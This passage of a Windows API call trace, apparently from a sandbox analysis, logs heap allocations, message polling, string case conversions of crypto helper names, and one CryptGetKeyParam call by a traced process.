RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0199.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0199.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0199.724] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0199.724] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0199.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0199.724] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0199.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0199.724] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0199.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0199.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0199.725] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0199.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0199.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0199.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0199.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0199.725] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0199.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0199.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0199.725] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0199.725] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0199.725] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0199.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0199.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2638 [0199.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0199.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0199.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0199.725] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0199.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd948 [0199.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0199.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0199.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0199.725] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0199.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0199.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0199.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0199.725] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0199.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0199.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0199.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0199.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0199.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0199.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0199.726] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0199.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0199.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0199.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0199.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0199.726] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0199.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0199.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0199.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0199.726] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0199.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa548 [0199.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0199.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0199.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0199.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0199.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0199.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0199.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0199.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0199.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0199.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0199.726] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0199.726] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0199.726] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0199.726] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0199.726] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0199.726] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0199.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0199.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0199.726] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0199.726] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0199.727] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0199.727] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0199.727] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0199.727] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0199.727] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0199.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0199.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0199.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0199.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0199.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0199.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0199.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0199.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0199.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0199.727] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0199.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0199.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0199.727] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0199.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0199.727] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0199.727] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0199.727] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0199.727] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0199.727] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0199.727] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0199.727] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0199.727] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0199.727] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0199.727] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0199.727] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0199.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0199.728] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0199.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0199.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0199.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0199.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0199.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0199.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0199.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0199.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0199.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0199.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0199.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0199.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0199.728] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0199.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0199.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba168 [0199.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0199.728] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0199.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0199.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0199.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0199.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0199.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0199.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0199.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0199.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0199.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0199.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0199.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0199.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0199.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0199.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0199.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0199.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0199.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0199.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0199.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0199.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0199.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0199.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0199.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0199.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0199.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0199.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0199.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0199.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0199.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0199.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0199.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0199.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0199.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0199.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0199.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0199.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0199.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0199.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0199.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0199.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0199.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0199.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0199.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0199.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0199.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0199.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0199.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0199.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0199.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0199.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0199.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0199.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0199.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0199.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0199.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0199.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0199.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0199.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0199.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0199.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0199.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0199.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0199.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0199.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0199.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0199.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0199.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0199.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0199.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0199.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0199.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0199.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0199.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0199.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0199.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0199.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0199.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0199.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0199.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0199.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0199.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0199.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0199.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0199.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0199.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0199.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0199.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0199.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0199.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0199.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0199.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0199.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0199.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0199.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0199.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0199.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0199.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0199.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0199.732] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.732] CryptGetKeyParam (in: hKey=0x90af18, dwParam=0x7, pbData=0x9c2778, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2778*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0199.732] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0199.732] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0199.732] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.732] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.732] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.732] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0199.732] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.732] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0199.732] CharUpperBuffW (in: 